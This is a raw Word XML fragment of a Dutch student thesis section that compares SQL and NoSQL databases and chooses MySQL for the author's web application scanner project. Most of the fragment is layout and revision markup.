          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Één op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F6FC9" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veel op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F501E4C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Zoals in figuur 3.5.2 is aangegeven is tabel Comment afhankelijk van tabel Blog met een één op veel relatie. Een ander krachtige functie van SQL is het gebruik van JOINS. JOINS worden gebruikt bij het selecteren van data uit meerdere tabellen. SQL databases maken gebruik van Constraints (beperkingen) binnen het systeem. Contraints zijn regels waar een tabel zich aan moet houden zo kan het de invoer van specifieke data types limiteren of ervoor zorgen dat velden niet leeg mogen zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA75739" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aantal </w:t>
      </w:r>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Contrains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA0B3D" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>NOT  NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1DDB5C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077514BE" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00815674" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A978F8" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00714FFE" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92818F" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">SQL databases bieden de middelen aan, om gestructureerde databases te ontwerpen en bouwen en waar, op een georganiseerde manier data in kan worden opgeslagen. SQL databases gebruik je wanneer het een eis is van het systeem dat data op een gestructureerde en georganiseerde manier moet worden opgeslagen en wanneer het systeem de invoer van data limiteert met Constrains (beperkingen). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08811F06" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FD503" w14:textId="49497891" w:rsidR="00DE405E" w:rsidRPr="00CC4DB8" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253280256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C2015CE" wp14:editId="79E28309">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897185</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899369</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="852" name="Rectangle 8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BCDEC" id="Rectangle 852" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.65pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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VepI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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CC4DB8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voordelen van een NO-SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBB7E6" w14:textId="08F20F81" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Wanneer er een grote hoeveelheid data aanwezig is en het is niet mogelijk om een ervoor gedefinieerde structuur te ontwerpen dan is het niet verstandig om het in een relationele database op te slaan. NOSQL biedt hier een oplossing voor, het is geschikt voor web applicaties met grootschalige databases die geen gebruik maken van relationele schema en die zeer schaalbaar moeten zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FAA3EF" w14:textId="1B1F8917" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">NOSQL databases zijn makkelijker te beheren vanwege hun simpele data model structuur, dit verlaagd de administratie en configuratie eisen van een DBMS en dat verlaagd weer de onderhoud kosten. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776FD632" w14:textId="6D8EDF0A" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">NOSQL databases hebben veel minder restricties dan rationele databases. Door de key-value structuur dat in documenten worden opgeslagen in de database, zorgt ervoor dat web applicaties virtueel met elke data structuur kunnen werken. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18793C38" w14:textId="39D2B298" w:rsidR="00DE405E" w:rsidRPr="00CC4DB8" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07F427" w14:textId="7A9A3113" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Als een systeem schaalbaar moet zijn, een groot hoeveelheid data moet verwerken waarvan de structuur niet vooraf gedefinieerd kan worden en het onderhouden van een RDBMS financieel niet mogelijk is dan biedt NOSQL database een geschikte oplossing voor het probleem.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E64C5" w14:textId="5A121604" w:rsidR="00DE405E" w:rsidRPr="00461740" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461740">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCA2ED" w14:textId="09B9F36F" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Met betrekking tot het projectcontext kan ik stellen dat NOSQL niet geschikt is voor het software systeem die ik ga ontwikkelen voor mijn afstudeerproject. De systeemeisen van de Webapplicatie scanner met betrekking tot de database komen niet overeen met wat een NOSQL kenmerkt, op een aantal zaken na. De database heeft een vooraf gedefinieerde data structuur, het maakt gebruik van integriteitsregels en entiteit relaties. De zaken die wel overeenkomen zijn: grote hoeveelheid data dat verwerkt moet worden en, vanwege de modulariteit van het systeem is de schaalbaarheid van een NOSQL database ook een belangrijk kenmerk.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63630AE7" w14:textId="15688EAA" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394FB6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A63195" w14:textId="03BF9984" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>In de voorgaande deel heb ik mijn keuze laten vallen op de relationele DBMS. Wat er nu overblijft voor dit deelonderzoek is het vinden van een geschikte DBMS. Ik zal enkel kijken naar open source database systemen dus die van Microsoft en IBM vallen al af. Dit zijn tevens ook de twee grootste leveranciers van DBMS op Oracle na die naast een commerciële versie, ook een open source versie aanbiedt (MySQL). Ik heb in het verleden alleen met één RDBMS gewerkt, en dat is MySQL. Deze heeft twee versies de web versie phpMyAdmin en voor Desktop MySQL Workbench. Deze is het meest gangbare en meest populaire als het gaat om open source database applicaties. MySQL is voor grootschalige database servers ideaal en heeft veel features en een goed support community. Het heeft een lage leercurve en is relatief makkelijk te implementeren in een ontwikkelomgeving zoals Laravel. Er zijn een aantal andere databasemanagementsystemen die open source zijn maar, in dit geval hoef ik niet verder te zoeken omdat dit al een geschikte optie is voor mijn Webapplicatie scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C91006" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="001A1A4B" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006176AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Database afhankelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA3AD8" w14:textId="0D6217A9" w:rsidR="00B95B79" w:rsidRPr="00F241F6" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">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sectPr w:rsidR="00B95B79" w:rsidRPr="00F241F6" w:rsidSect="008D40E9">
      <w:headerReference w:type="default" r:id="rId158"/>
      <w:headerReference w:type="first" r:id="rId159"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1417" w:bottom="285"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C7E0" w14:textId="77777777" w:rsidR="00D85C27" w:rsidRDefault="00D85C27" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65A2F8A9" w14:textId="77777777" w:rsidR="00D85C27" w:rsidRDefault="00D85C27"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0E3238" w:rsidRDefault="000E3238" w:rsidP="000F5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0E3238" w:rsidRDefault="000E3238"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2F3D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="000F58FB">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="none" w:vAnchor="text" w:hAnchor="page" w:x="10302" w:y="-45"/>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00143F12">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>46</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7DEC3F19" w14:textId="5D99830F" w:rsidR="000E3238" w:rsidRDefault="000E3238"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1522" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="002E7D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F12">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>49</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="5B113839" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="000F58F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0E3238" w:rsidRDefault="000E3238"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8B4">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>90</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="56E18E34" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00E1319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CEC3" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="002E7D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8B4">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>82</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4CE39DC5" w14:textId="74781E58" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="000F58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D204" w14:textId="77777777" w:rsidR="00D85C27" w:rsidRDefault="00D85C27" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17E109B6" w14:textId="77777777" w:rsidR="00D85C27" w:rsidRDefault="00D85C27"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6CC8" w14:textId="6545AC8A" w:rsidR="000E3238" w:rsidRDefault="000E3238">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72C95BF0" wp14:editId="1D653E68">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5958840</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335280</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="622300" cy="646430"/>
          <wp:effectExtent l="0" t="0" r="1270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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"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935F9"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0E3238" w:rsidRPr="00CD40CE" w:rsidRDefault="000E3238">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268"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0E3238" w:rsidRPr="00CD40CE" w:rsidRDefault="000E3238">
                    <w:pPr>
                      <w:rPr>
                        <w:lang w:val="en-US"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:lang w:val="en-US"/>
                      </w:rPr>
                      <w:t>DB</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>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0E3238" w:rsidRDefault="000E3238">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5D082C9B" w:rsidR="000E3238" w:rsidRDefault="000E3238">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251746304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DA42042" wp14:editId="070C2685">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-463550</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>2540</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="10668000" cy="457200"/>
              <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
              <wp:wrapNone/>
              <wp:docPr id="752" name="Rectangle 752"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="10668000" cy="457200"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="BC24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E531" id="Rectangle 752" o:spid="_x0000_s1026" style="position:absolute;margin-left:-36.5pt;margin-top:.2pt;width:840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" fillcolor="#bc2422" strokecolor="#1f3763 [1604]"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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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53FCD185"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54496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24FECC63" wp14:editId="16E50EF2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-367030</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-165100</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="472440" cy="332740"/>
          <wp:effectExtent l="50800" t="76200" r="35560" b="73660"/>
          <wp:wrapSquare wrapText="bothSides"/>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0160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30C49F89" wp14:editId="7D8B2027">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6007735</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332105</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="1270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298D3E01" w:rsidR="000E3238" w:rsidRDefault="000E3238">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A90739F" wp14:editId="06F85CDE">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-307975</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-164465</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="472440" cy="332740"/>
          <wp:effectExtent l="50800" t="76200" r="35560" b="7366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0E3238" w:rsidRDefault="000E3238">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08A" w14:textId="568FAF2B"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56544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E1E96B0" wp14:editId="613FF9BB">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6007735</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332105</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E323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0E3238" w:rsidRDefault="000E3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BCE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3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="25"/>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FB4"/>
    <w:rsid w:val="000070BF"/>
    <w:rsid w:val="000070E1"/>
    <w:rsid w:val="000074EF"/>
    <w:rsid w:val="000077DA"/>
    <w:rsid w:val="00007F4E"/>
    <w:rsid w:val="0001023F"/>
    <w:rsid w:val="00010741"/>
    <w:rsid w:val="000107FE"/>
    <w:rsid w:val="000108F0"/>
    <w:rsid w:val="00010BCB"/>
    <w:rsid w:val="000110A3"/>
    <w:rsid w:val="00011313"/>
    <w:rsid w:val="00011555"/>
    <w:rsid w:val="000116D5"/>
    <w:rsid w:val="00011FE4"/>
    <w:rsid w:val="000121B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2C2"/>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785"/>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57E8"/>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7A9"/>
    <w:rsid w:val="00082827"/>
    <w:rsid w:val="000829ED"/>
    <w:rsid w:val="0008300D"/>
    <w:rsid w:val="000831B7"/>
    <w:rsid w:val="000831CC"/>
    <w:rsid w:val="00083203"/>
    <w:rsid w:val="00083215"/>
    <w:rsid w:val="000832B9"/>
    <w:rsid w:val="000837C4"/>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C97"/>
    <w:rsid w:val="00091D46"/>
    <w:rsid w:val="00092156"/>
    <w:rsid w:val="000921A2"/>
    <w:rsid w:val="0009250A"/>
    <w:rsid w:val="00092798"/>
    <w:rsid w:val="0009286A"/>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1FB"/>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AD4"/>
    <w:rsid w:val="000E0C77"/>
    <w:rsid w:val="000E0DF8"/>
    <w:rsid w:val="000E1129"/>
    <w:rsid w:val="000E1230"/>
    <w:rsid w:val="000E14BF"/>
    <w:rsid w:val="000E1506"/>
    <w:rsid w:val="000E1D53"/>
    <w:rsid w:val="000E1F16"/>
    <w:rsid w:val="000E2041"/>
    <w:rsid w:val="000E249A"/>
    <w:rsid w:val="000E2685"/>
    <w:rsid w:val="000E2896"/>
    <w:rsid w:val="000E2D2B"/>
    <w:rsid w:val="000E3016"/>
    <w:rsid w:val="000E30A2"/>
    <w:rsid w:val="000E3238"/>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896"/>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8FB"/>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0DEF"/>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A0C"/>
    <w:rsid w:val="00132E4E"/>
    <w:rsid w:val="00132EB0"/>
    <w:rsid w:val="00133001"/>
    <w:rsid w:val="00133264"/>
    <w:rsid w:val="001332B0"/>
    <w:rsid w:val="00133353"/>
    <w:rsid w:val="00133AC7"/>
    <w:rsid w:val="00133B9F"/>
    <w:rsid w:val="00133E1C"/>
    <w:rsid w:val="00133E6D"/>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3F12"/>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0FF3"/>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059"/>
    <w:rsid w:val="0018055A"/>
    <w:rsid w:val="00180628"/>
    <w:rsid w:val="00180AA2"/>
    <w:rsid w:val="00180F10"/>
    <w:rsid w:val="00180FDD"/>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6CE"/>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4E72"/>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932"/>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ECA"/>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C7F56"/>
    <w:rsid w:val="001D00CB"/>
    <w:rsid w:val="001D0228"/>
    <w:rsid w:val="001D0482"/>
    <w:rsid w:val="001D06F0"/>
    <w:rsid w:val="001D06F3"/>
    <w:rsid w:val="001D08BB"/>
    <w:rsid w:val="001D0A6C"/>
    <w:rsid w:val="001D0E37"/>
    <w:rsid w:val="001D12C4"/>
    <w:rsid w:val="001D12F1"/>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376"/>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1D"/>
    <w:rsid w:val="001E6978"/>
    <w:rsid w:val="001E700F"/>
    <w:rsid w:val="001E7AD9"/>
    <w:rsid w:val="001E7E3E"/>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09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096"/>
    <w:rsid w:val="002412C2"/>
    <w:rsid w:val="0024164A"/>
    <w:rsid w:val="00241A4D"/>
    <w:rsid w:val="00241C83"/>
    <w:rsid w:val="00242008"/>
    <w:rsid w:val="00242DA8"/>
    <w:rsid w:val="00242EE5"/>
    <w:rsid w:val="00242FB4"/>
    <w:rsid w:val="00243098"/>
    <w:rsid w:val="0024321A"/>
    <w:rsid w:val="00243A5E"/>
    <w:rsid w:val="00243A93"/>
    <w:rsid w:val="00243AFA"/>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57E5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2FA3"/>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712"/>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8E3"/>
    <w:rsid w:val="002A3943"/>
    <w:rsid w:val="002A3A62"/>
    <w:rsid w:val="002A3DC2"/>
    <w:rsid w:val="002A3F78"/>
    <w:rsid w:val="002A41F1"/>
    <w:rsid w:val="002A43B6"/>
    <w:rsid w:val="002A47D2"/>
    <w:rsid w:val="002A48F6"/>
    <w:rsid w:val="002A49DF"/>
    <w:rsid w:val="002A4A48"/>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5C"/>
    <w:rsid w:val="002E7D6A"/>
    <w:rsid w:val="002E7F33"/>
    <w:rsid w:val="002F0557"/>
    <w:rsid w:val="002F0561"/>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1F"/>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5FD7"/>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0D1"/>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0E52"/>
    <w:rsid w:val="00341002"/>
    <w:rsid w:val="0034162A"/>
    <w:rsid w:val="00341B69"/>
    <w:rsid w:val="00342106"/>
    <w:rsid w:val="003421C9"/>
    <w:rsid w:val="003426CC"/>
    <w:rsid w:val="003430BA"/>
    <w:rsid w:val="003430FB"/>
    <w:rsid w:val="00343865"/>
    <w:rsid w:val="003438AD"/>
    <w:rsid w:val="00343AE4"/>
    <w:rsid w:val="00343D03"/>
    <w:rsid w:val="00343E4F"/>
    <w:rsid w:val="00344125"/>
    <w:rsid w:val="003441AF"/>
    <w:rsid w:val="00344273"/>
    <w:rsid w:val="003443FB"/>
    <w:rsid w:val="003449F8"/>
    <w:rsid w:val="00344AE5"/>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7DB"/>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2D"/>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3ED"/>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904"/>
    <w:rsid w:val="00393BA5"/>
    <w:rsid w:val="0039403A"/>
    <w:rsid w:val="0039417A"/>
    <w:rsid w:val="003942BD"/>
    <w:rsid w:val="0039450B"/>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A9D"/>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700"/>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59E"/>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6F99"/>
